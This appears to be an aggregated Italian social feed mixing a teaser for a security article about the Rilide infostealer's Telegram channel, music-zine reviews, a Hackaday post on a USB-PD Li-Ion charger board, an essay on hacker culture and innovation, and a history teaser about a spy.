Delfi Security ritiene che ogni incident responder potrebbe trarre beneficio dalla capacità di valutare la sicurezza dei canali Telegram e di applicare tale conoscenza quando affronta campioni di malware che li utilizzano per C&C o es

L'articolo Infiltrati nel Canale Telegram di Rilide Infostealer! Gli esperti italiani ci spiegano come funziona proviene da il blog della sicurezza informatica.

“Uzeda – Do it yourself” è un docufilm, realizzato dalla regista Maria Arena (e prodotto da DNA audiovisivi e dalla casa di produzione indipendente Point Nemo) che racconta la storia degli Uzeda, fondamentale alternative/math/noise rock band italiana, formatasi nel 1987, che ha tracciato il proprio percorso musicale senza scinderlo da quello umano, fortemente etico.... @Musica Agorà

iyezine.com/uzeda-arriva-nei-c…

Uzeda, arriva nei cinema il docufilm "Do it yourself"

Uzeda, arriva nei cinema il docufilm "Do it yourself" - "Uzeda - Do it yourself" è un docufilm, realizzato dalla regista Maria Arena (e prodotto da DNA audiovisivi e dalla casa di produzione indipendente Point Nemo) che racconta la storia degli Uzeda…

^{Reverend Shit-Man (In Your Eyes ezine)}

Monos : la realtà vuole però che la band nasca da una folgorazione (probabilmente non di origine divina) avuta da Mr. Bonobo e Mr. Gorilla rispettivamente alla chitarra e alla batteria. La loro prima uscita è datata 2019 mentre il nuovo album è alle porte.

@Musica Agorà

iyezine.com/monos-road-to-perv…

Monos - "Road to Perversion" e quattro chiacchiere

Monos - "Road to Perversion" e quattro chiacchiere - Monos : la realtà vuole però che la band nasca da una folgorazione (probabilmente non di origine divina) avuta da Mr. Bonobo e Mr. Gorilla rispettivamente alla chitarra e alla batteria.

^{Claudio Frandina (In Your Eyes ezine)}

I Khost sono un pianeta oscuro che vaga per lo spazio cerebrale mietendo vittime, portando con sé un rumorismo molto potente, e fatto di industrial, doom, drone, dark ambient, nosie geneticamente modificato e molto di più.
@Musica Agorà

iyezine.com/khost-many-things-…

Khost - Many Things Afflict Us Few Things Console Us

Khost - Many Things Afflict Us Few Things Console Us - I Khost sono un pianeta oscuro che vaga per lo spazio cerebrale mietendo vittime, portando con sé un rumorismo molto potente, e fatto di industrial, doom, drone, dark ambient, nosie geneticamente…

^{Massimo Argo (In Your Eyes ezine)}

Ever want a seriously powerful PCB for charging a Li-Ion pack? Whatever you want it for, [Redherring32] has got it — it’s a board bearing the TPS25750D and BQ25713 chips, that lets you push up to 100 W into your 1S Li-Ion pack through the magic of USB Power Delivery (USB-PD).

Why do you need so much power? Well, when you put together a large amount of Li-Ion cells, this is how you charge it all at once – an average laptop might charge the internal battery at 30 W, and it’s not uncommon for laptop batteries to be dwarfed by hackers’-built packs.

A 4-layer creation peppered with vias, this board’s a hefty one — it’s not often that you see a Li-Ion charger designed to push as much current as possible into a cell, and the chips are smart enough for that. As far as the onboard chips’ capabilities go, the board could handle pack configurations from 1S to 4S, and even act as a USB-PD source — check the IC configuration before you expect to use it for any specific purpose.

Want a simpler charger, even if it’s less powerful? Remember, you can use PPS-capable PD chargers for topping up Li-Ion packs, with barely any extra hardware required.

hackaday.com/2024/10/04/need-h…

Abbiamo parlato in un precedente articolo del Tech Model Railroad Clubdell’MIT, dove tutto ebbe inizio, dicendo che “l’hacking è un percorso e non una destinazione”, raccontandovi che la cultura hacker prende forma da molto lontano.

Ma abbiamo anche visto che l’hacking non è riferito solo all’Information Technology ma abbraccia tutte le discipline, e che

“Quando cerchi di superare un limite, di superare quel muro che hai davanti con innovazione e virtuosismo, diventi anche tu un “hacker”.

Una immagine del Tech Model Railroad Club dove nasce la community Hacker

Gli insegnamenti della cultura hacker

Nel corso del tempo, la cultura Hacker è stata influenzata e plasmata da differenti persone e gruppi che hanno rincorso la chimera della curiosità, dell’arte, dell’intelletto, dell’innovazione, assetati di vedere oltre, dove gli altri non erano riusciti a farlo prima.

Anche Steve Jobs disse in una sua famosa frase “siate affamati e siate folli”.

Ma non dimentichiamoci che anche lui assieme all’amico Wozniak militava all’interno del gruppo “Homebrew Computer Club” dove dal 1975 e per ben 10 anni, si parlava solo di schede e circuiti, oltre alla condivisione di informazioni su tutto quello che ruotava attorno ai microcomputer.

La follia è alla base delle più grandi innovazioni di sempre!

Clayton Christensen dell’università di Harvard

Nella teoria imprenditoriale, la “Disruptive Innovation” (termine coniato da Clayton Christensen dell’università di Harvard) viene definita come “una innovazione che crea un nuovo mercato e una rete di valore interrompendo quello esistente, sostituendo aziende, prodotti e alleanze leader del mercato”.

L’hacking è qualcosa di grande!

Questo di fatto è saper “Intaccare”, saper innovare, saper carpire piccoli dettagli, con intuito, per poi poterli plasmare, migliorare per poi arrivare a concetti totalmente nuovi, a mondi completamente inesplorati e sconosciuti.

Ma perché molti imprenditori e innovatori, in settori diversi, vengono presi per matti?

E’ normale … tutto questo, fa parte della psicologia umana.

Vedere le cose in maniera non convenzionale spaventa a molti ed in particolrare spaventa:

• coloro che traggono benefici dal rimanere stanziali;
• chi ama non uscire dalla propria Confort zone;
• chi avrebbe potuto arrivare alla stessa tua idea, ma banamente non ci è riuscito o non ci ha mai provato;
• chi potrebbe subire problemi qualora la tua idea andasse in porto.

Il primo ufficio del fondatore di Amazon Jeff Bezos

I grandi innovatori hanno saputo cogliere le occasioni

Jeff Bezos, il famoso fondatore di Amazon partì da una idea apparentemente semplice, quella di vendere libri online. Spesso cita il famoso “Giorno Uno”, quel mix di eccitazione e incertezza, classico di una cosa promettente che sta per cominciare ma che nessuno ne conosce le sue reali potenzialità.

Ad esempio, l’emergenza legata al Coronavirus può essere una nuova opportunità da cavalcare, per incominciare a sviluppare una visione strategica diversa, implementare nuovi servizi, nuovi modi di utilizzare la tecnologia abbinata ai processi aziendali, produttivi, distributivi e commerciali.

Ci sarà sicuramente chi cavalcherà questo futuro, perché sarà capace di “Intaccare” tutto quello che esiste già e lo farà con una nuova “innovazione”. Ogni innovatore ha sempre creduto fortemente in quello che faceva dal primo giorno e non si è mai abbattuto una volta arrivati i primi fallimenti.

Gli insegnamenti dei fallimenti sono una cosa importante

Sicuramente ad ogni nuova avventura, è importante saper superare gli ostacoli interiori, guardarsi dentro, in particolare scoprire la paura di fallire, ma diciamola meglio “essere in grado di fallire”, perché fa parte del proprio autocontrollo e di saper perseverare e saper aspettare.

“Gli imprenditori presenti o futuri, devono imparare ad accettare il fallimento, mettendo in conto che accadrà, il successo di solito non arriva subito, ma occorrerà cadere e poi rialzarsi più forti di prima. Questo lo dobbiamo imparare.“

Inoltre noi Italiani non siamo amanti dei fallimenti.

In altri paesi il fallimento è percepito come un elemento positivo, perché fa parte della nostra storia, vuol dire che ci hai provato e che quella non era la strada giusta e che dovrai migliorarla per puntare meglio all’obiettivo.

Imparare dai propri errori è fondamentale. Esattamente come veniva fatto settanta anni fa al Tech Model Railroad Club.

Quindi… siate gli Hacker del vostro futuro!

L'articolo L’Hacking è follia? Un viaggio tra innovazione, ingegno perseveranza e passione proviene da il blog della sicurezza informatica.

storicang.it/foto-del-giorno/s…

@Storia
@Storiaweb

La spia che si finse donna per venti anni

Shi Pei Pu fu un cantante lirico cinese che lavorava come spia. Fin qui niente di strano, se non fosse perché si finse donna e diventò l'amante di un diplomatico francese per ben venti anni.

^{Abel G.M. (National Geographic Storica)}